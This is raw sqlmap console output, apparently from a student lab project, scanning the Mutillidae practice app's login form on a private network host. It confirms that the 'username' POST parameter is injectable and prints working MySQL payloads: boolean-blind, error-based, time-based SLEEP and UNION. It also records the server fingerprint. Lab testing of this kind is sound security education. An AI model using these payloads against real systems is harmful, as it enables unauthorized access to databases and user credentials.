        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.9#stable}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:45:10 /2026-04-02/

[12:45:10] [WARNING] using '/home/kali/FYP-1/results/shahrukh/http:__192-168-78-102_mutillidae_index-php?page=login-php_20260402_124404/sqlmap_data' as the output directory
[12:45:10] [INFO] fetched random HTTP User-Agent header value 'Opera/9.60 (Windows NT 5.1; U; sv) Presto/2.1.1' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
do you want to check for the existence of site's sitemap(.xml) [y/N] N
[12:45:10] [INFO] starting crawler for target URL 'http://192.168.78.102/mutillidae/index.php?page=login.php'
[12:45:10] [INFO] searching for links with depth 1
[12:45:10] [INFO] starting 2 threads
do you want to normalize crawling results [Y/n] Y
do you want to store crawling results to a temporary file for eventual further processing with other tools [y/N] N
[12:45:10] [INFO] found a total of 2 targets
[1/2] Form:
POST http://192.168.78.102/mutillidae/index.php?page=login.php
Cookie: PHPSESSID=219cf4150d690d4e14e4893e3f8b35a4
POST data: username=&password=&login-php-submit-button=Login
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: username=&password=&login-php-submit-button=Login] (Warning: blank fields detected): username=&password=&login-php-submit-button=Login
do you want to fill blank fields with random values? [Y/n] Y
[12:45:10] [INFO] using '/home/kali/FYP-1/results/shahrukh/http:__192-168-78-102_mutillidae_index-php?page=login-php_20260402_124404/sqlmap_data/results-04022026_1245pm.csv' as the CSV results file in multiple targets mode
[12:45:11] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:45:11] [INFO] testing if the target URL content is stable
[12:45:11] [INFO] target URL content is stable
[12:45:11] [INFO] testing if POST parameter 'username' is dynamic
[12:45:12] [WARNING] POST parameter 'username' does not appear to be dynamic
[12:45:12] [INFO] heuristic (basic) test shows that POST parameter 'username' might be injectable (possible DBMS: 'MySQL')
[12:45:12] [INFO] heuristic (XSS) test shows that POST parameter 'username' might be vulnerable to cross-site scripting (XSS) attacks
[12:45:13] [INFO] testing for SQL injection on POST parameter 'username'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:45:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:45:13] [WARNING] reflective value(s) found and filtering out
[12:45:14] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:45:15] [INFO] testing 'Generic inline queries'
[12:45:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[12:45:20] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
got a 302 redirect to 'http://192.168.78.102/mutillidae/index.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
[12:45:24] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[12:45:25] [INFO] POST parameter 'username' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable (with --not-string="may")
[12:45:25] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:45:25] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:45:25] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:45:25] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:45:25] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[12:45:25] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[12:45:26] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:45:26] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:45:26] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:45:26] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:45:26] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[12:45:26] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[12:45:26] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[12:45:27] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[12:45:27] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:45:27] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[12:45:27] [INFO] POST parameter 'username' is 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)' injectable 
[12:45:27] [INFO] testing 'MySQL inline queries'
[12:45:27] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[12:45:27] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[12:45:28] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[12:45:28] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[12:45:28] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[12:45:28] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[12:45:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:45:38] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[12:45:38] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:45:38] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[12:45:38] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:45:39] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:45:39] [INFO] target URL appears to have 5 columns in query
[12:45:39] [INFO] POST parameter 'username' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[12:45:39] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 139 HTTP(s) requests:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: username=IiXx' OR NOT 9094=9094#&password=xIXu&login-php-submit-button=Login

    Type: error-based
    Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: username=IiXx' OR ROW(6816,5329)>(SELECT COUNT(*),CONCAT(0x7176706b71,(SELECT (ELT(6816=6816,1))),0x71627a7a71,FLOOR(RAND(0)*2))x FROM (SELECT 7384 UNION SELECT 6460 UNION SELECT 7468 UNION SELECT 6889)a GROUP BY x)-- ICUX&password=xIXu&login-php-submit-button=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=IiXx' AND (SELECT 4226 FROM (SELECT(SLEEP(5)))zzJo)-- YYtR&password=xIXu&login-php-submit-button=Login

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: username=IiXx' UNION ALL SELECT NULL,CONCAT(0x7176706b71,0x6e4156784f4565757a734e787370724167716764486e6f4647447873434c4b6a515a42594f4e5667,0x71627a7a71),NULL,NULL,NULL#&password=xIXu&login-php-submit-button=Login
---
do you want to exploit this SQL injection? [Y/n] Y
[12:45:39] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: Apache 2.2.8, PHP 5.2.4
back-end DBMS: MySQL >= 4.1
SQL injection vulnerability has already been detected against '192.168.78.102'. Do you want to skip further tests involving it? [Y/n] Y
[12:45:40] [INFO] skipping 'http://192.168.78.102/mutillidae/index.php?page=login.php'
[12:45:40] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/kali/FYP-1/results/shahrukh/http:__192-168-78-102_mutillidae_index-php?page=login-php_20260402_124404/sqlmap_data/results-04022026_1245pm.csv'
[12:45:40] [WARNING] your sqlmap version is outdated

[*] ending @ 12:45:40 /2026-04-02/

